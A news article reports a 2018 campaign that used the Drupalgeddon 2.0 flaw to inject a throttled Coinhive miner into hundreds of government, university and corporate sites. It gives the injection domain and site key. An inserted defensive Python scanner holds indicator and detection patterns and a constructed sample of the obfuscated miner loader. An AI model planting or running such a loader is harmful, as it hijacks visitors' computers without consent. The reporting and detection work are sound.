Hundreds of websites running on the Drupal content management system – including those of the San Diego Zoo as well as the National Labor Relations Board – were targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.
The attacks, which have impacted 400+ government and university websites, leverage the critical remote-code execution vulnerability (CVE-2018-7600) known as Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in question has been patched for over a month.
“After the scan completed, the full scope of this cryptojacking campaign was established,” Troy Mursch wrote in a report posted Saturday. “Using the bulk scan feature of urlscan.io, it became clear that these were all sites running outdated and vulnerable versions of the Drupal content management system.”
This #cryptojacking outbreak started at the zoo and quickly spread to 400+ other sites.
— Bad Packets Report (@bad_packets) May 7, 2018
As of Tuesday, Mursch said he had found more sites that were targeted by the attack, including those of Lenovo, UCLA, and the Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a U.S. federal government agency).
Sheet has been updated with additional sites. It’s not an exhaustive list and is subject to change as this #cryptojacking campaign is still ongoing.
— Bad Packets Report (@bad_packets) May 8, 2018
Mursch said he was notified soon after by one of his Twitter followers of additional compromised sites using a different payload; however, all the infected sites pointed to the same domain and used the same Coinhive site key. A Coinhive site key is an identifier tied to a unique cryptographic key that determines who receives the cryptocurrency being mined.
The domain used to inject the miner was vuuwd[.]com, according to Mursch. “Once the code was de-obfuscated, the reference to ‘http://vuuwd[.]com/t.js’ was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.”
The site key used, meanwhile, was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” Mursch said he confirmed the key was still active by checking it in Fiddler.
Mursch said the miner was only slightly throttled, so that it had a reduced impact on visitors’ CPUs and would be harder to detect.
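The injection chain described above (a script tag pointing at an attacker domain, an escape-obfuscated loader, a Coinhive site key and a throttle value) can be checked for from the defender's side by scanning what a site actually serves. The following is an added example, not code from the article or from Bad Packets Report. It uses the domain vuuwd[.]com (written undefanged so hostnames compare) and the site key quoted in the article as indicators; the sample page, the t.js body and the throttle value 0.2 are constructed for the demonstration, since the article only says the miner was "slightly throttled". The regexes target Coinhive's public `CoinHive.Anonymous(key, {throttle: ...})` API.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Indicators quoted in the article (the article defangs the domain as vuuwd[.]com).
INJECTION_HOSTS = {"vuuwd.com"}
KNOWN_SITE_KEYS = {"KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6"}

SCRIPT_SRC_RE = re.compile(r"<script[^>]+src=[\"']([^\"']+)[\"']", re.IGNORECASE)
# Coinhive's public API: new CoinHive.Anonymous("<32-char site key>", {throttle: 0.x})
SITE_KEY_RE = re.compile(r"CoinHive\.Anonymous\(\s*[\"']([A-Za-z0-9]{32})[\"']")
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9]*\.?[0-9]+)")
JS_ESCAPE_RE = re.compile(r"\\(?:x([0-9A-Fa-f]{2})|u([0-9A-Fa-f]{4}))")


@dataclass(frozen=True)
class Finding:
    url: str        # script that triggered the finding
    indicator: str  # category of evidence
    detail: str     # the matched value


def decode_js_escapes(src: str) -> str:
    """Undo \\xHH / \\uHHHH string escapes, a common trick for hiding strings
    such as 'script' or 'https://' from naive grep-based checks."""
    return JS_ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), src)


def scan_script(url: str, body: str) -> list:
    """Return the Coinhive-related evidence found in one script body."""
    js = decode_js_escapes(body)
    findings = []
    if js != body:
        findings.append(Finding(url, "escaped-strings", "hex/unicode-escaped string literals"))
    if "coinhive.min.js" in js or "CoinHive." in js:
        findings.append(Finding(url, "coinhive-reference", "Coinhive library or API referenced"))
    for key in SITE_KEY_RE.findall(js):
        label = "known-malicious-site-key" if key in KNOWN_SITE_KEYS else "coinhive-site-key"
        findings.append(Finding(url, label, key))
    m = THROTTLE_RE.search(js)
    if m:
        findings.append(Finding(url, "throttle", m.group(1)))
    return findings


def scan_page(html: str, fetch) -> list:
    """Walk every external <script src> in the page; fetch(url) returns the
    script body or None (a dict lookup here, an HTTP client in practice)."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname or ""
        if host in INJECTION_HOSTS:
            findings.append(Finding(src, "known-injection-domain", host))
        body = fetch(src)
        if body is not None:
            findings.extend(scan_script(src, body))
    return findings


# Constructed sample: a page whose injected loader points at vuuwd.com/t.js.
PAGE_HTML = '<html><head><script src="http://vuuwd.com/t.js"></script></head><body>Zoo</body></html>'
# Constructed t.js: escape-obfuscated loader plus the miner call. The throttle
# value 0.2 is an assumption; the article only says "slightly throttled".
SCRIPTS = {
    "http://vuuwd.com/t.js": (
        r'var s=document.createElement("\x73\x63\x72\x69\x70\x74");'
        r's.src="\x68\x74\x74\x70\x73\x3a\x2f\x2fcoinhive.com/lib/coinhive.min.js";'
        r'document.head.appendChild(s);s.onload=function(){'
        r'var m=new CoinHive.Anonymous("KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6",{throttle:0.2});m.start();};'
    ),
}

if __name__ == "__main__":
    for f in scan_page(PAGE_HTML, SCRIPTS.get):
        print(f"{f.indicator:26} {f.detail}  ({f.url})")
```

Decoding string escapes before matching is what turns the obfuscated loader into something a plain indicator match can see; a low throttle value combined with a Coinhive reference is the same signal Mursch describes, a miner tuned to stay under the CPU-usage radar rather than to maximise hashrate.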
Typically, cryptojacking attacks are not throttled and use 100% of the target’s CPU. As a result, victims can sometimes experience overheating of their phone or computer as the device is bogged down by an over-taxed processor.
When trying to nail down the owner of vuuwd[.]com, Mursch came across fake WHOIS data indicating that “it belongs to ‘X XYZ’ who lives on ‘joker joker’ street in China,” he explained in a tweet. However, the email address used (firstname.lastname@example.org) provided a small hint, as it was associated with other registered domains.
While the clearly fake WHOIS data may seem like a dead end, the same email address (email@example.com) was used to register five other domains. It’s likely you’d find malicious activity tied to these as well. One of the domains references less-fake information. pic.twitter.com/IEeqXrAKTT
— Bad Packets Report (@bad_packets) May 4, 2018
The domain vuuwd[.]com had also been used previously in Monero mining operations through the mineXMR[.]com pool, said Mursch. “While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made.”
Drupalgeddon 2.0, which has been patched for over a month now and impacts versions 6, 7, and 8 of Drupal’s CMS platform, “potentially allows attackers to exploit several attack vectors on a Drupal site, which could result in the site being completely compromised,” according to MITRE’s Common Vulnerabilities and Exposures bulletin published March 28.
Since Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware families have cropped up, including a recent attack using the “Kitty” cryptomining malware, which cashed in on vulnerable Drupal websites.
Beyond the Kitty malware, researchers have found a botnet, dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems.
More recently, attackers behind a ransomware attack hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.
“We’ve seen many examples of Drupalgeddon 2 being exploited in the past few weeks,” said Troy Mursch in the report. “This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a site operator using Drupal’s content management system, you need to update to the latest available version ASAP.”